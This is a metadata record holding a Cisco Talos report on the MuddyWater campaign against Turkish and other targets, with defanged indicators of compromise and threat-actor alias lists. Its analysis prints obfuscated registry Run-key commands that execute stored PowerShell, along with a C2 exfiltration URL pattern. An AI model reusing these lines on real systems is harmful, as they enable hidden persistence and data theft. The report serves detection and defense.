{
	"id": "aad86a92-f635-46d5-81d9-62f93d1fe60d",
	"created_at": "2026-04-06T00:11:28.173598Z",
	"updated_at": "2026-04-10T03:34:22.475575Z",
	"deleted_at": null,
	"sha1_hash": "e699b65ac7f5c9c09cc5b9bada429369da92fb0e",
	"title": "Iranian APT MuddyWater targets Turkish users via malicious PDFs, executables",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1856642,
	"plain_text": "Iranian APT MuddyWater targets Turkish users via malicious PDFs,\r\nexecutables\r\nBy Asheer Malhotra\r\nPublished: 2022-01-31 · Archived: 2026-04-02 12:27:20 UTC\r\nCisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental\r\ninstitutions.\r\nTalos attributes this campaign with high confidence to MuddyWater — an APT group recently attributed to\r\nIran's Ministry of Intelligence and Security (MOIS) by the U.S. Cyber Command.\r\nThis campaign utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds into the target's enterprise. MuddyWater's use of script-based\r\ncomponents such as obfuscated PowerShell-based downloaders is also a tactic described in the advisory from\r\nJanuary 2021 by the U.S. Cyber Command.\r\nThis campaign also utilizes canary tokens to track successful infection of targets, a new addition to this\r\ngroup's arsenal of tactics, techniques and procedures (TTPs).\r\nThis specific method of taking advantage of canary tokens in this campaign may also be a measure to evade\r\nsandbox-based detection systems.\r\nA highly motivated threat actor such as MuddyWater can use unauthorized access to conduct espionage,\r\nintellectual property theft and deploy ransomware and destructive malware in an enterprise.\r\nExecutive summary\r\nMuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East\r\nand South Asia.\r\nA typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like\r\nPowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins).\r\nCisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign\r\nconsists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection\r\nvector. 
These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health\r\nand Interior Ministries.\r\nNext, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and\r\ninstrumentors for additional payloads.\r\nWe've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These\r\ntokens are meant to signal a successful infection of a target by the group's malicious artifacts.\r\nMuddyWater threat actor\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 1 of 20\n\nMuddyWater, also known as MERCURY or Static Kitten, is an APT group recently attributed to Iran's Ministry of\r\nIntelligence and Security (MOIS) by U.S. Cyber Command. This threat actor, active since at least 2017, frequently\r\nconducts campaigns against high-value targets in American, European and Asian countries. Campaigns carried out by\r\nthe threat actor aim to achieve one of three outcomes:\r\nEspionage - Supporting the political dominance of the nation state in the Middle East. This is business as\r\nusual for the threat actor, motivated by nation-state interests.\r\nIntellectual property theft - Enables economic advantages to the nation state. This goal is accomplished by\r\ncarrying out aggressive campaigns against private entities and government-affiliated institutions such as\r\nuniversities and research entities.\r\nRansomware attacks - MuddyWater has previously attempted to deploy ransomware such as Thanos on victim\r\nnetworks to either destroy evidence of their intrusions or disrupt operations of private organizations.\r\nThis group frequently relies on the use of DNS as part of their means to contact the command and control (C2), while\r\nthe initial contact with hosting servers is done via HTTP. 
Their initial payloads usually use PowerShell and Visual\r\nBasic scripting along with LoLBins to assist in the initial stages of the infection.\r\nCampaign targeting Turkey\r\nTalos recently observed a campaign operating as recently as November 2021, which we attribute with high\r\nconfidence to the MuddyWater group, targeting Turkish government entities, including the Scientific And\r\nTechnological Research Council of Turkey — Tubitak. This campaign consisted of the use of malicious Excel\r\ndocuments (XLS maldocs) and executables stored on a file hosting domain \"snapfile[.]org\", which would be\r\ndelivered to the victims in the form of PDF documents with embedded links.\r\nThese maldocs, hosted on attacker-controlled or public media-sharing websites, are downloaded by malicious PDFs\r\nmeant to trick the targets into downloading and opening the maldocs. Based on historic evidence of similar\r\ncampaigns conducted by MuddyWater, it is highly likely that these PDFs served as the initial entry points to the\r\nattacks and were distributed via email messages as part of spear-phishing efforts conducted by the group.\r\nMalicious Excel sheet analysis\r\nTalos identified a set of malicious Microsoft Excel spreadsheet files distributed with Turkish language names. Some\r\nof these files were named to masquerade as legitimate documents from the Turkish Health and Interior Ministries.\r\nAnother file discovered was called \"Teklif_form_onaylı.xls,\" which can be translated to \"Offer_form_approved.xls\"\r\nfrom Turkish. Analysis of the maldocs deployed in this campaign demonstrates a clear evolution of their\r\nimplementation culminating in versions that are fully obfuscated.\r\nThe documents show some subtle changes — almost as if different versions were being tested. 
Older documents\r\nhad some information in the document's metadata, such as the title field \"Sayyid\" and author name \"Aurelia\".\r\nThese initial versions also consisted of an un-obfuscated PowerShell payload in the document's comments fields.\r\nSubsequent iterations of the maldocs saw progressive obfuscation of various malicious code blocks.\r\nNow, the maldocs consist of malicious VBA macros meant to instrument the infection chain. Overall, the macro\r\ncontained in all the maldocs accomplished the same set of functionalities without any major evolutions as described\r\nbelow.\r\nPersistence\r\nThe infection chain instrumented by the VBA macros consists of creating three key artifacts on the infected endpoint:\r\nRegistry key for persistence.\r\nMalicious VB script intermediate component that the macro sets up for persistence.\r\nMalicious PowerShell-based downloader script: The actual post-infection payload instrumentor used for\r\nexecuting arbitrary code on the infected endpoint.\r\nThe VB script's persistence is set up by creating a malicious Registry Run key for the infected user:\r\nHKCU\\Software\\Microsoft\\windows\\CurrentVersion\\Run | \u003crandom\u003e\r\nThis campaign relies on the use of a LoLBin to execute the malicious VBScript.\r\nIn some instances, the attackers make use of a LoLBin DLL called pcwutl.dll, which is part of the operating system,\r\nto execute the VBScript on reboot or re-login. Although the use of LoLBins is fairly common as a means of lateral\r\nmovement, this one is not commonly used to execute the malicious payload.\r\nTracking tokens\r\nAs the maldocs were evolving, some of the metadata details were removed or generalized, and eventually, the latest\r\nversions consisted of obfuscated PowerShell payloads residing in the comments field.\r\nThe malicious VBA macros consisted of the same set of functionalities for creating the malicious VBS and PS1\r\nscripts, and achieving persistence across reboots. 
However, there was one interesting addition to the macro\r\nfunctionality now. The latest versions of the VBA code deployed could make HTTP requests to a canary token from\r\ncanarytokens.com.\r\nCanary tokens are tokens that can be embedded in objects like documents, web pages and emails. When that object is\r\nopened, an HTTP request to canarytokens.com is generated, alerting the token's owner that the object was opened.\r\nThe canary token is typically triggered silently twice during the execution of the macro. In cooperation with\r\nCanarytokens.com, a list of other tokens created by the same user was added to the IOC section below.\r\nAn attacker may use such tokens to serve one or more purposes such as:\r\nTracking Tokens: A way of tracking who is detonating the malicious code, keeping track of successful\r\ninfections.\r\nTracking tokens can be an anti-analysis method. In this campaign, the server that hosts the final payload may\r\nonly deliver if it first receives two almost simultaneous requests to the token. This would thwart researchers\r\nwho solely request the payload from the server without registering with the canary tokens using an HTTP\r\nrequest.\r\nTracking tokens may also be used as another means of anti-analysis: timing checks. The infection chain\r\nconsists of a PS1-based downloader and two sets of HTTP requests for the canary tokens. A reasonable timing\r\ncheck on the duration between the token requests and the request to download a payload can indicate\r\nautomated analysis. Automated sandboxed systems would typically execute the malicious macro generating\r\nthe token requests. A sandbox would also identify the creation of the registry Run key and re-login the infected\r\nuser to execute the malicious PS1 that generates the request to download the next payload. 
Typically, since\r\nsandbox-based analysis systems spin up analysis environments for a limited number of minutes, the token\r\nrequests and payload requests wouldn't be too far apart from each other temporally. A very short\r\ninterval between the HTTP token requests and the PS1 requesting the payload may indicate automated analysis of\r\nthe maldocs and can be used to block payload requests from the infected endpoint.\r\nTracking tokens can also be a method to detect the blocking of the payload server. If they keep receiving\r\nrequests to the token but not to the payload server, that is an indication of their payload server being blocked,\r\nand by whom.\r\nIntermediate VB Script component (VBS)\r\nThe VBS file is a straightforward executor of the PowerShell script dropped by the macro to disk.\r\nVBS executing the PS1 on the endpoint.\r\nMalicious PowerShell-based downloader\r\nThe PowerShell script deployed in the attack is meant to download and execute the next payload (also a PS1 script)\r\non the infected endpoint. This PS1 script resides in the metadata of the maldoc and is dropped by the macro.\r\nPrimitive versions of the maldocs consisted of unobfuscated versions of the PS1 script, with obfuscations being\r\nintroduced in newer versions.\r\nPS1 downloader script.\r\nThe PowerShell script downloads another PowerShell script from a remote location, which is then executed. It\r\ntries twice, with a custom timeout of 40 seconds and a custom user agent, which is appended with the character \"|\"\r\nas a separator and the username executing the script. In other versions of the script, the \"|\" character is not appended.\r\nThe fact that the downloader script attempts the download of the payload twice with a long timeout further indicates\r\nthat the canary tokens serve the purpose of anti-analysis. 
That is, the C2 may need more time to check if the\r\ncanary tokens have been accessed before it delivers the final payload. We could not obtain the final payload, but our\r\ntests indicate that there was some kind of verification process being performed prior to the delivery of the payload.\r\nInfection chain\r\nThe delivery mechanism for this campaign is the distribution of PDF files containing embedded links. Talos found at\r\nleast two PDF files which shared the same author name, \"nejla\", in the metadata. The PDF files typically show an\r\nerror message and ask the user to click on a link to resolve the issue and display the correct format/extension of the\r\ndocument.\r\nOnce the victim clicks on the download button, the endpoint receives a second stage, which can be either a malicious\r\nXLS file or a Windows executable that proceeds with the infection as described earlier.\r\nThe maldoc-based infection chain is as follows:\r\nMalicious executables-based infection chain\r\nThe initial delivery mechanism of the infection chains consists of the malicious PDF files as the first stage. The URLs\r\ncorresponding to the download button in the PDF files will typically host the malicious XLS files containing the\r\nmacros that deploy the subsequent VBS and PS1 scripts.\r\nWe have, however, recently observed a variation of this infection chain. 
This second variation consists of the PDF\r\npointing to a URL that delivers a Windows executable (EXE) in the infection chain instead of the malicious XLS\r\nfiles.\r\nThe EXEs are meant to instrument a similar infection chain consisting of the intermediate VBS and final PS1-based\r\ndownloaders.\r\nTurkey\r\nThe EXEs typically use a Turkish name indicating that they can either be delivered via the malicious PDFs or\r\ndistributed independently. One example of an executable was named \"Surec_No_cc2021-pdf377811f-66ad-4397-\r\nbd35-3247101e2fda-eta332018.exe\" which can be translated from Turkish as \"Period_No_\u003c...\u003e32018.exe.\"\r\nOnce executed, the sample drops a text file in the victim's temporary folder. This is actually a decoy PDF or Office\r\ndocument in hex format. During execution, the hex representation of the decoy document is decoded to create a\r\nreadable copy in the %temp% folder. The decoy will then be opened by the system PDF or document reader and\r\ndisplayed to the victim.\r\nOnce the decoy document has been displayed to the victim, the executable starts its main malicious task:\r\ndownloading and executing malicious PowerShell scripts served to it by a remote location. Here, we see that the\r\nintermediate VBS scripts used in the maldoc-based infection chain have been replaced with a PowerShell-based\r\nimplementation.\r\nThe implant will first create a directory in the user's home folder. 
This directory will be used to store two PowerShell\r\nscripts:\r\nInstrumentor script used to activate the next stage from disk called \".CloudCache.conf.\"\r\nDownloader script used to download the next stage from a remote location for execution on the endpoint\r\ncalled \".CloudDrive.conf.\"\r\nJust like maldoc-based infections, a registry key is created at\r\nHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN | \u003cSome Application Name\u003e for\r\npersistence.\r\nFor example:\r\nHKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\RUN | CloudDrive.\r\nThe registry Run key takes advantage of LoLBins to run the payload. In this case, it uses\r\nSyncAppvPublishingServer.vbs to execute PowerShell code, which will execute the code stored in the instrumentor\r\nscript (\".CloudCache.conf\"):\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"CloudDrive\"=\"C:\\\\Windows\\\\System32\\\\SyncAppvPublishingServer.vbs \\\"n;.('{2}{0}{1}' -f[string][char][int]101,\r\n[string][char][int]88,'i')((.('{2}{0}{1}' -f[string][char][int]101,[string][char][int]88,'i')((Get-content\r\n$env:USERPROFILE\\\\.CloudDrive\\\\.CloudCache.conf))))\\\"\"\r\nThe instrumentor script is responsible for base64 decoding the contents of the downloader (the second PS1 script)\r\nand executing it on the endpoint.\r\nContents of the instrumentor PS1 .CloudCache.ps1.\r\nThe second PS1 script is the actual downloader of the next stage of PowerShell code that is run on the infected\r\nendpoint. 
It downloads the next stage of PowerShell code from a remote location and executes it on the infected\r\nendpoint.\r\nDownloader script.\r\nUnfortunately, there was no way for us to download the final payload.\r\nPakistan\r\nAnother version of the executable deployed by the attacker in August 2021 targeted Pakistani entities. We are unsure\r\nat this time whether the November 2021 targeting of Turkish users is a continuation of this Pakistan-related activity.\r\nThis executable again consists of a decoy document presented to the victim followed by the instrumentation of a\r\nPowerShell-based downloader script.\r\nThis executable also uses the Registry run key for persistence of its artifacts on the system. However, in this case, we\r\nsaw a variation in the infection chain:\r\nThe attackers skipped using the instrumentor PS1 script as seen in the latest infection chain (described above).\r\nInstead, the attackers configured the Registry run key to execute the downloader script directly via\r\nSyncAppvPublishingServer.vbs.\r\n[HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Run]\r\n\"OwnDrive\"=\"C:\\\\Windows\\\\System32\\\\SyncAppvPublishingServer.vbs \\\"n;.('{2}{0}{1}' -f[string][char][int]101,\r\n[string][char][int]88,'i')([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-content\r\n$env:USERPROFILE\\\\.VirtualBoxer\\\\.VirtualBoxer.conf))))\\\"\"\r\nThe downloader script used in this instance consists of capabilities to collect preliminary data, such as the computer\r\nname, to register the infection with the C2 server.\r\nThe script will then reach out to the C2 for requesting PowerShell commands to execute. 
The response received is\r\nparsed by the implant to check if the computer name sent back by the C2 matches the current computer name. If a\r\nmatch is found, the corresponding PowerShell commands issued by the C2 are executed on the endpoint and the\r\noutput/response is AES encrypted and returned to the C2.\r\nThe URL for returning the output of a command executed on the system is:\r\nhttp://\u003cC2_IP\u003e/images?guid=\u003cbase64_encoded + AES encrypted output\u003e\r\nThe User Agent used for all these communications is: Googlebot/2.1 (+http://www.google.com/bot.html)\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 11 of 20\n\nPS1-based downloader script.\r\nTracking Tokens\r\nWe observed the decoy documents reaching out to a remote location:\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/Pan-op/gallery.jpg\r\nSimilar URLs on this server were accessed in previously observed MuddyWater campaigns targeting Pakistan.\r\nIt is highly likely that the attackers used this server as a token tracker to monitor successful infections in this\r\ncampaign. This token tracking system was then later migrated to CanaryTokens in September 2021 in the attacks\r\ntargeting Turkey using the malicious Excel documents (illustrated earlier).\r\nhttps://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html\r\nPage 12 of 20\n\nArmenia\r\nAnother example of a similar executable used by the threat actor in June 2021 was one to target the\r\ntelecommunications sector in Armenia. 
The decoy document displayed to the victim in this case consists of an\r\ninternal guide (Maintenance Operation Protocol (MOP)) for Armenia's Viva-MTS telecom solution provider from\r\nEricsson pertaining to their Smart Services Routers (SSRs) and Evolved Packet Gateway (EPG).\r\nDecoy document used while targeting Telecom entities.\r\nWhat's interesting is that the decoy document was created on June 6, 2021 and modified on June 8. The malicious\r\nexecutable carrying this decoy was generated a day later, on June 9; thus, it is likely that either the attackers created\r\nthe draft of the decoy themselves or had immediate access to their victims that enabled them to exfiltrate documents\r\nthat were then used as decoys and lures to proliferate their campaigns to similar targets of interest.\r\nThe entire infection chain employed in this campaign, using the malicious PowerShell-based downloader, was later\r\nseen again in the attack targeting Pakistani entities in August 2021.\r\nThe EXE-based infection chain is as follows:\r\nAttribution\r\nTalos assesses with high confidence that these campaigns are the work of the Iranian state-sponsored threat actor\r\nMuddyWater. This assessment is based on both technical indicators and the tactics, techniques, and procedures\r\n(TTPs) employed by the threat actor. The infection chains used in the campaigns illustrated in this research bear a\r\nclose resemblance to those described in Secureworks' report from 2020. We also have a high-fidelity IOC from a\r\ntrusted source that was used in a key part of the infection chains. 
This IOC has also been used in previous\r\nMuddyWater campaigns.\r\nWhile we cannot disclose additional details at this time due to intelligence sharing sensitivities, we assess that this\r\nparticular finding is significant enough to justify a high-confidence assessment on attribution.\r\nThe malicious XLS lures and the executables used in this campaign deploy two malicious files - a loader and a\r\ndownloader that retrieve the final payloads using a hardcoded URL pointing to a specific hardcoded IP address.\r\nSecureworks' report shows the same technique, albeit based on a batch file and a PowerShell script, while the\r\ncampaign targeting Turkish entities uses either a VBS or PS1 script activated via a simple registry entry. In both cases,\r\nthe key PowerShell script's only objective is to download malicious payloads from the C2.\r\nCode and metadata similarities in the maldocs and accompanying scripts utilized in this campaign bear a high degree\r\nof resemblance to previously discovered MuddyWater artifacts.\r\n(A high-fidelity YARA rule for tracking artifacts related to this campaign and previously discovered MuddyWater\r\nartifacts is APT_MuddyWater_MalDoc_Feb20_1, authored by Florian Roth.)\r\nOne of the C2 IP addresses used by the malicious PowerShell downloaders deployed in this campaign,\r\n185[.]118[.]167[.]120, is also listed in a Turkish threat advisory dated September 2021.\r\nEnglish translation of a threat advisory from Trakya.\r\nThis advisory from the Trakya University in Turkey and a USOM (Turkey National Cyber Incident Response Center)\r\nannouncement contains an alert to an APT-level attack. 
The initial attack vector is the email service, with emails sent\r\nfrom the following attacker-owned accounts:\r\nsisterdoreencontreve@gmail[.]com\r\nlillianwnwindrope@gmail[.]com\r\ndoctor.x.2020@gmail[.]com\r\nubuntoubunto1398@gmail[.]com\r\na.sara.1995a@gmail[.]com\r\nThis advisory lists C2 IP addresses that have also been observed in this campaign:\r\n185[.]118[.]167[.]120\r\n185[.]118[.]164[.]165\r\n185[.]118[.]164[.]195\r\n185[.]118[.]164[.]213\r\nThe first three IPs in the list are used by the PowerShell scripts dropped by the malicious XLS lures to\r\ndownload a payload.\r\nTalos confirmed the usage of the email address doctor.x.2020@gmail[.]com listed in the advisory to this campaign\r\nusing XLS and executables targeting Turkey.\r\nConclusion\r\nTalos has observed Iran-related groups carry out malicious campaigns all over the world in recent years. 2021 was\r\nalso prolific in cybersecurity incidents targeting Iranian state-run organizations. These events were attributed to\r\nWestern nations by the Iranian regime, with the promise of revenge. It's hard to say if these campaigns are the result\r\nof such promises or just part of MuddyWater's usual activity.\r\nHowever, the fact that the threat actors have changed some of their methods of operation and tools is another sign of\r\ntheir adaptability and unwillingness to refrain from attacking other nations. In this post we have shown\r\nthe same group running two different campaigns using different tools while targeting the same country, in this case\r\nTurkey, showing their capacity and motivation to compromise their targets and perform their espionage activities.\r\nIn-depth defense strategies based on a risk analysis approach can deliver the best results in prevention. 
However,\r\nthis should always be complemented by a good incident response plan which has not only been tested with tabletop\r\nexercises but is also reviewed and improved every time it's put to the test on real engagements.\r\nCoverage\r\nWays our customers can detect and block this threat are listed below.\r\nCisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware\r\ndetailed in this post. Try Secure Endpoint for free here.\r\nCisco Secure Web Appliance web scanning prevents access to malicious websites and detects malware used in these\r\nattacks.\r\nCisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their\r\ncampaign. You can try Secure Email for free here.\r\nCisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense\r\nVirtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.\r\nCisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically\r\nand alerts users of potentially unwanted activity on every connected device.\r\nCisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco\r\nSecure products.\r\nUmbrella, Cisco's secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs,\r\nwhether users are on or off the corporate network. 
Sign up for a free trial of Umbrella here.\r\nCisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and\r\ntests suspicious sites before users access them.\r\nAdditional protections with context to your specific environment and threat data are available from the Firewall\r\nManagement Center.\r\nCisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.\r\nOpen-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available\r\nfor purchase on Snort.org.\r\nSnort SIDs for this threat are: 58929-58938.\r\nOrbital Queries\r\nCisco Secure Endpoint users can use Orbital Advanced Search to run complex OSqueries to see if their endpoints are\r\ninfected with this specific threat. For specific OSqueries on this threat, click below:\r\nPowerShell scripts\r\nVB Scripts\r\nIOCs\r\nWe would like to thank Canary Tools for their cooperation, support and inputs into this 
research.\r\nHashes\r\n8d6ed63f2ffa053a683810f5f96c76813cdca2e188f16d549e002b2f63cee001\r\n42aa5a474abc9efd3289833eab9e72a560fee48765b94b605fac469739a515c1\r\nd3ecc4137fc9a6d7418b4780864baf64cf7417d7badf463dff6ea48cd455915b\r\n9991b185c9e9732501e0c2bd841e32a4022f0735a0527150bc8e64ac363d409d\r\nd9de66497ad189d785d7535ab263e92ffad81df20b903c5e1d36859b4ed38b6d\r\n5cdc7dd6162a8c791d50f5b2c5136d7ba3bf417104e6096bd4a2b76ea499a2f4\r\n26ed7e89b3c5058836252e0a8ed9ec6b58f5f82a2e543bc6a97b3fd17ae3e4ec\r\na8701fd6a5eb45e044f8bf150793f4189473dde46e0af8314652f6bf670c0a34\r\nb726f4dd745891070f2e516d5d4e4f2f1ce0bf3ff685dc3800455383f342e54d\r\nc9931382f844b61a002f83db1ae475953bbab449529be737df1eee8b3065f6eb\r\nfcdd38ff378605c66333429d9df2242fbce25a5f69f4d6d4c11d9613bcb409b0\r\nc13cb1c9277324534075f807a3fcd24d0d3c024197c7437bf65db78f6a987f7a\r\n450302fb71d8e0e30c80f19cfe7fb7801b223754698cac0997eb3a3c8e440a48\r\nb1e30cce6df16d83b82b751edca57aa17795d8d0cdd960ecee7d90832b0ee76c\r\n921b4520b75fcd0071944a483d738223b222ba101e70f2950fbfbc22afbdb5d0\r\nd7de68febbbdb72ff820f6554afb464b5c204c434faa6ffe9b4daf6b691d535f\r\n8b9be9e4d18c5fc71cd12dbfd60ea41eb88a07497e96faa2ba20fdc929b32c0b\r\n7dc49601fa6485c3a2cb1d519794bee004fb7fc0f3b37394a1aef6fceefec0c8\r\na69fee382cf86f9e457e0688932cbd00671d0d5218f8043f1ee385278ee19c8c\r\n63e404011aeabb964ce63f467be29d678d0576bddb72124d491ab5565e1044cf\r\n6910ddb58aee9a77e7bb9cadef9e6280a9b5b495edf0b6538cf8bdc1db8b1f4c\r\nd851badfcf3b3a8b4210bdb33948d0d1d918ec6bf0f1f85cbae6bb8feec7cd74\r\naa72f1543d4a4e6ecbfc2da0167f5601c5c692bed73243cf01f616bc4af68afe\r\n8f255a1f2e17828a5b9205d6991e2c85c3320311da28048785262396cbc568c7\r\ncddd5514b7ed3d33ff8eaa16b7b71621ced857755246683e0d28c4650ea744bf\r\nb4d0161ecab5a7847d325c88ce1a4fc2ca2e11fad0b77638b63ae1781c8b5793\r\nf6569039513e261ba9c70640e6eb8f59a0c72471889d3c0eaba51bdebb91d285\r\n28f2198f811bbd09be31ad51bac49ba0be5e46ebf5c617c49305bb7e274b198c\r\n04d6ed9c6d4a37401ad3c586374f169b0aa8d609710bdcf5434d39e0fd4ed9bd\r\n69e3a454c191ee38663112cf5358a54cca1229188087ed18e92bc9c59b014912\r\ndc28b5e878152b5305b8d251019895caa56a7a95a68eccb89a6ecc41da8aadb9\r\nIPs\r\n137.74.131[.]16\r\n185.118.167[.]120\r\n185.118.164[.]165\r\n185.118.164[.]195\r\n185.118.164[.]213\r\n149.202.242[.]84\r\n5.199.133[.]149\r\n88.119.170[.]124\r\n185.118.164[.]165\r\n7.236.212[.]22\r\n172.245.81[.]135\r\n185.141.27[.]211\r\nURLs\r\nhxxp://185.118.167[.]120/\r\nhxxp://137.74.131[.]16:443/\r\nhxxp://185.141.27[.]211:443/\r\nhxxp://149.202.242[.]84:443/\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/ef4f0d9af47d737076923cfccfe01ba7/layer.jpg\r\nhxxp://172.245.81[.]135:10196/Geq5P3aFpaSrK3PZtErNgUsVCfqQ9kZ9/Pan-op/gallery.jpg\r\nhxxps://snapfile[.]org/d/c7817a35554e88572b7b\r\nhxxps://snapfile[.]org/d/0c88a47c3160338bbb68\r\nhxxp://snapfile[.]org/756a12c43a0fb8d56fbf\r\nhxxps://snapfile[.]org/5bc3985cf17565a97dbd\r\nhxxps://snapfile[.]org/55e1c83e920bb7dc949c\r\nhxxp://canarytokens[.]com/about/d3g23n4gdcrep20q3wzm153xn/index.html\r\nhxxp://canarytokens[.]com/tags/traffic/images/azp6ai8pg5aq0c619ur0qzi6h/\r\nhxxp://canarytokens[.]com/tags/traffic/images/azp6ai8pg5aq0c619ur0qzi6h/post.jsp\r\nOther canary tokens used by MuddyWater:\r\noy80la8r9iyub22nbhb7wvxrk\r\nkbu1xo0s8ktfxrzsn9iuei3e9\r\nazp6ai8pg5aq0c619ur0qzi6h\r\no1txrtd8gn7i9rt159k5baoys\r\nsmnszrsk7gqjplt0j1idwjrcr\r\nagsbmym5re3whgnd5a8kzntai\r\n60ld4guht70xby71u3io4w43n\r\nlmbvetj0iif8dwjgutckpppq3\r\nkc7snpabrp9z0wp1p1klqgkr9\r\n04p62zz698bdzv2fdbgupdm4j\r\nmpei7e608jb22i90z9x8g0gdu\r\nqut1gl1r6ywzgs1ts922sxtqv\r\n09xzzwe761avzxxmyzi85r7hv\r\nnx4fiakqe1gc02hrnlv8fyis4\r\nb90963gx06jykhz61kv534zcm\r\nbruhtg2dtbzk7j1fsttxga85e\r\nd3g23n4gdcrep20q3wzm153xn\r\nxxe2sm2rddhxfto9gjx25fo9c\r\ngikx04xwvf3uu4af8ekrvfeoj\r\nSource: https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"MITRE"
	],
	"references": [
		"https://blog.talosintelligence.com/2022/01/iranian-apt-muddywater-targets-turkey.html"
	],
	"report_names": [
		"iranian-apt-muddywater-targets-turkey.html"
	],
	"threat_actors": [
		{
			"id": "02e1c2df-8abd-49b1-91d1-61bc733cf96b",
			"created_at": "2022-10-25T15:50:23.308924Z",
			"updated_at": "2026-04-10T02:00:05.298591Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"MuddyWater",
				"Earth Vetala",
				"Static Kitten",
				"Seedworm",
				"TEMP.Zagros",
				"Mango Sandstorm",
				"TA450"
			],
			"source_name": "MITRE:MuddyWater",
			"tools": [
				"STARWHALE",
				"POWERSTATS",
				"Out1",
				"PowerSploit",
				"Small Sieve",
				"Mori",
				"Mimikatz",
				"LaZagne",
				"PowGoop",
				"CrackMapExec",
				"ConnectWise",
				"SHARPSTATS",
				"RemoteUtilities",
				"Koadic"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "2ed8d590-defa-4873-b2de-b75c9b30931e",
			"created_at": "2023-01-06T13:46:38.730137Z",
			"updated_at": "2026-04-10T02:00:03.08136Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"TEMP.Zagros",
				"Seedworm",
				"COBALT ULSTER",
				"G0069",
				"ATK51",
				"Mango Sandstorm",
				"TA450",
				"Static Kitten",
				"Boggy Serpens",
				"Earth Vetala"
			],
			"source_name": "MISPGALAXY:MuddyWater",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "156b3bc5-14b7-48e1-b19d-23aa17492621",
			"created_at": "2025-08-07T02:03:24.793494Z",
			"updated_at": "2026-04-10T02:00:03.634641Z",
			"deleted_at": null,
			"main_name": "COBALT ULSTER",
			"aliases": [
				"Boggy Serpens ",
				"ENT-11 ",
				"Earth Vetala ",
				"ITG17 ",
				"MERCURY ",
				"Mango Sandstorm ",
				"MuddyWater ",
				"STAC 1171 ",
				"Seedworm ",
				"Static Kitten ",
				"TA450 ",
				"TEMP.Zagros ",
				"UNC3313 ",
				"Yellow Nix "
			],
			"source_name": "Secureworks:COBALT ULSTER",
			"tools": [
				"CrackMapExec",
				"Empire",
				"FORELORD",
				"Koadic",
				"LaZagne",
				"Metasploit",
				"Mimikatz",
				"Plink",
				"PowerStats"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "3c430d71-ab2b-4588-820a-42dd6cfc39fb",
			"created_at": "2022-10-25T16:07:23.880522Z",
			"updated_at": "2026-04-10T02:00:04.775749Z",
			"deleted_at": null,
			"main_name": "MuddyWater",
			"aliases": [
				"ATK 51",
				"Boggy Serpens",
				"Cobalt Ulster",
				"G0069",
				"ITG17",
				"Mango Sandstorm",
				"MuddyWater",
				"Operation BlackWater",
				"Operation Earth Vetala",
				"Operation Quicksand",
				"Seedworm",
				"Static Kitten",
				"T-APT-14",
				"TA450",
				"TEMP.Zagros",
				"Yellow Nix"
			],
			"source_name": "ETDA:MuddyWater",
			"tools": [
				"Agentemis",
				"BugSleep",
				"CLOUDSTATS",
				"ChromeCookiesView",
				"Cobalt Strike",
				"CobaltStrike",
				"CrackMapExec",
				"DCHSpy",
				"DELPHSTATS",
				"EmPyre",
				"EmpireProject",
				"FruityC2",
				"Koadic",
				"LOLBAS",
				"LOLBins",
				"LaZagne",
				"Living off the Land",
				"MZCookiesView",
				"Meterpreter",
				"Mimikatz",
				"MuddyC2Go",
				"MuddyRot",
				"Mudwater",
				"POWERSTATS",
				"PRB-Backdoor",
				"PhonyC2",
				"PowGoop",
				"PowerShell Empire",
				"PowerSploit",
				"Powermud",
				"QUADAGENT",
				"SHARPSTATS",
				"SSF",
				"Secure Socket Funneling",
				"Shootback",
				"Smbmap",
				"Valyria",
				"chrome-passwords",
				"cobeacon",
				"prb_backdoor"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434288,
	"ts_updated_at": 1775792062,
